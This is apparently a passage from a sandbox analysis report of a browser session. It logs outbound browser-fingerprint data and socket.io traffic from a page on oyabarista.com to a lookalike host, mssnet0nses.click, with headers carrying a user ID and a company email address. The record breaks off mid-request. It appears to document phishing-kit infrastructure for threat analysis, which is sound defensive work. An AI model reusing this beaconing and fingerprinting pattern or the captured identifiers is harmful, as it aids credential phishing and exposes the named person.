                                                        2025-03-27 13:42:05 UTC16384OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 50 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69
                                                        Data Ascii: Bnative+code%5D+%7D%22%2C%22SVGAnimatedString%22%3A%22function+SVGAnimatedString%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedRect%22%3A%22function+SVGAnimatedRect%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedPreserveAspectRatio%22%3A%22functi
                                                        2025-03-27 13:42:05 UTC16384OUTData Raw: 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 61 70 74 69 6f 6e 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62
                                                        Data Ascii: 7D%22%2C%22HTMLTableColElement%22%3A%22function+HTMLTableColElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCellElement%22%3A%22function+HTMLTableCellElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCaptionElement%22%3A%22function+HTMLTab
                                                        2025-03-27 13:42:05 UTC16384OUTData Raw: 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 66 72 61 6d 65 73 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 66
                                                        Data Ascii: B+%5Bnative+code%5D+%7D%22%2C%22CSSLayerBlockRule%22%3A%22function+CSSLayerBlockRule%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeywordValue%22%3A%22function+CSSKeywordValue%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeyframesRule%22%3A%22function+CSSKeyf
                                                        2025-03-27 13:42:05 UTC16384OUTData Raw: 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 57 72 69 74 61 62 6c 65 46 69 6c 65 53 74
                                                        Data Ascii: %28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemFileHandle%22%3A%22function+FileSystemFileHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemHandle%22%3A%22function+FileSystemHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemWritableFileSt
                                                        2025-03-27 13:42:05 UTC16384OUTData Raw: 32 25 32 43 25 32 32 54 61 73 6b 53 69 67 6e 61 6c 25 32 32 25 32 43 25 32 32 54 61 73 6b 50 72 69 6f 72 69 74 79 43 68 61 6e 67 65 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 54 61 73 6b 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 32 43 25 32 32 54 61 73 6b 41 74 74 72 69 62 75 74 69 6f 6e 54 69 6d 69 6e 67 25 32 32 25 32 43 25 32 32 53 79 6e 63 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 53 75 62 6d 69 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 4c 69 73 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 52 65 61 64 4f 6e 6c 79 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 25 32 32 25 32 43 25 32 32 53 74 6f 72
                                                        Data Ascii: 2%2C%22TaskSignal%22%2C%22TaskPriorityChangeEvent%22%2C%22TaskController%22%2C%22TaskAttributionTiming%22%2C%22SyncManager%22%2C%22SubmitEvent%22%2C%22StyleSheetList%22%2C%22StyleSheet%22%2C%22StylePropertyMapReadOnly%22%2C%22StylePropertyMap%22%2C%22Stor
                                                        2025-03-27 13:42:05 UTC16384OUTData Raw: 32 63 6c 6f 73 65 25 32 32 25 32 43 25 32 32 63 6f 6e 66 69 72 6d 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 25 32 32 25 32 43 25 32 32 66 65 74 63 68 25 32 32 25 32 43 25 32 32 66 69 6e 64 25 32 32 25 32 43 25 32 32 66 6f 63 75 73 25 32 32 25 32 43 25 32 32 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 25 32 32 25 32 43 25 32 32 67 65 74 53 65 6c 65 63 74 69 6f 6e 25 32 32 25 32 43 25 32 32 6d 61 74 63 68 4d 65 64 69 61 25 32 32 25 32 43 25 32 32 6d 6f 76 65 42 79 25 32 32 25 32 43 25 32 32 6d 6f 76 65 54 6f 25 32 32 25 32 43 25 32 32 6f 70 65 6e 25 32 32 25 32 43 25 32 32 70 6f 73 74 4d 65 73 73 61 67 65 25 32 32 25 32 43 25 32 32 70 72 69 6e 74 25 32 32 25 32 43 25 32 32 70 72 6f 6d 70 74 25 32 32 25 32 43 25 32 32
                                                        Data Ascii: 2close%22%2C%22confirm%22%2C%22createImageBitmap%22%2C%22fetch%22%2C%22find%22%2C%22focus%22%2C%22getComputedStyle%22%2C%22getSelection%22%2C%22matchMedia%22%2C%22moveBy%22%2C%22moveTo%22%2C%22open%22%2C%22postMessage%22%2C%22print%22%2C%22prompt%22%2C%22
                                                        2025-03-27 13:42:05 UTC15956OUTData Raw: 53 74 61 6d 70 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 74 69 6d 65 53 74 61 6d 70 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 6f 6e 74 65 78 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 6f 6e 74 65 78 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 54 61 73 6b 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 54 61 73 6b 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6d 65 6d 6f 72 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 4d 65 6d 6f 72
                                                        Data Ascii: Stamp%22%3A%22function+timeStamp%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22context%22%3A%22function+context%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createTask%22%3A%22function+createTask%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22memory%22%3A%22%5Bobject+Memor


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        100192.168.2.549853172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:06 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrgMy&sid=aHb_mt7ltpbxBIUjAAfL HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:06 UTC282INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:06 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f20cc97236a-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-27 13:42:06 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
                                                        Data Ascii: 29{"code":1,"message":"Session ID unknown"}
                                                        2025-03-27 13:42:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        101192.168.2.549854172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:06 UTC567OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrgxy HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:07 UTC947INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:07 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tUOe1%2FTL10WOBIfUiqqZyRWIPOVMm1r1MVqZ3B6%2B7xJflp3yUlDpEdaIO6XgHLwp6iKcr6ri6y4Q78HW01tWFPwGL6%2Ba%2F2wfgjqpgaUSNRnSlk%2BKfz4yWgRwEuDNJKyUKXs1%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f26880941e1-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83896&min_rtt=83462&rtt_var=18021&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1139&delivery_rate=36589&cwnd=252&unsent_bytes=0&cid=fed62937387c1f07&ts=304&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        102192.168.2.549855172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:07 UTC667OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrgxy HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:07 UTC849INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:07 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xs8LWQszhLmDYFiytQ96qLpAu7sihTk4R61qn6qvu%2BM%2Bupvkaazt2jwHz%2B1bYdPdPZEXGvlnFJyx5EBuuSiuhGskFcNY4nrKDsyVUq%2FERSNQqGEMaFmSFD7neLCenzLr3JKvZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f298e56440c-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83376&min_rtt=83177&rtt_var=17849&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1239&delivery_rate=36475&cwnd=252&unsent_bytes=0&cid=63b693f1c7a084b9&ts=302&x=0"
                                                        2025-03-27 13:42:07 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 37 71 4d 48 31 51 6b 54 53 30 6b 30 4e 7a 4f 71 41 41 66 51 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"7qMH1QkTS0k0NzOqAAfQ","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        103192.168.2.549856172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:08 UTC593OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrhC-&sid=7qMH1QkTS0k0NzOqAAfQ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:08 UTC945INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:08 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kqc1WNhvsc%2FWlrj0qrTa7Xl7myiQOCzF2%2FXnA1DxwCdDlrV9oHby%2FyRAKEojVIM90k%2F%2BV4J26LcwolAiOXpjvaI1UjbbG5kIPMnkdrMmE5UDwoehTczMQVeGiAlUDEtWpVSHHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f2d79474376-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84214&min_rtt=84169&rtt_var=17781&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1165&delivery_rate=36298&cwnd=252&unsent_bytes=0&cid=52771092cf0bdc61&ts=311&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        104192.168.2.549857172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:08 UTC592OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrhDU&sid=7qMH1QkTS0k0NzOqAAfQ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:08 UTC939INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:08 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L29ERbCL4TonczjDyTfTYNDZTj8DBw5L5gwnsrCbAzIGqzRkB8luUvGaZJEk2P0G%2FSXDekHP3aszm3XRKixDy24Uj62aokdJNXUTSX95I0%2F75w3zSJU02JsLCLNy1LnDhGwXtw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f2d8883f25f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84350&min_rtt=84320&rtt_var=17833&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1164&delivery_rate=36211&cwnd=252&unsent_bytes=0&cid=b7d8dc2b84a26d6a&ts=302&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        105192.168.2.549858172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:08 UTC425OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrgxy HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:08 UTC300INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:08 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: no-store
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f2d8be341a6-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-27 13:42:08 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 51 6b 45 67 6d 65 6b 32 52 68 70 47 33 67 4d 52 41 41 66 52 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"QkEgmek2RhpG3gMRAAfR","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        106192.168.2.549859172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:08 UTC566OUTGET /socket.io/?EIO=4&transport=websocket&sid=7qMH1QkTS0k0NzOqAAfQ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://www.oyabarista.com
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: YyMTPNb80g+ImvIjL2M6NQ==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2025-03-27 13:42:08 UTC831INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:08 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2GxJ%2BGtSk9BfxtFsOzrAa1xRrXMnmf41Dk36n5vuinaQSucw1%2FVbZz5hZG6At1nIZ4p2B3UfftnZHdiy2zZmP2AHo49npgRQ16bKFISswoVntsBa%2BGpey1D%2FiuTlCyuqV3RCNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f2da9824407-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83729&min_rtt=83621&rtt_var=17739&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1121&delivery_rate=36543&cwnd=252&unsent_bytes=0&cid=7d0d1d90768cdac0&ts=312&x=0"
                                                        2025-03-27 13:42:08 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}
                                                        2025-03-27 13:42:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        107192.168.2.549861172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:08 UTC752OUTPOST /socket.io/?EIO=4&transport=polling&t=PNNrhC-&sid=7qMH1QkTS0k0NzOqAAfQ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Content-Length: 2
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Content-type: text/plain;charset=UTF-8
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:08 UTC2OUTData Raw: 34 30
                                                        Data Ascii: 40
                                                        2025-03-27 13:42:08 UTC291INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:08 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: no-store
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f308a3a80cd-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-27 13:42:08 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                        Data Ascii: 2ok
                                                        2025-03-27 13:42:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        108192.168.2.549860172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:08 UTC692OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrhDU&sid=7qMH1QkTS0k0NzOqAAfQ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
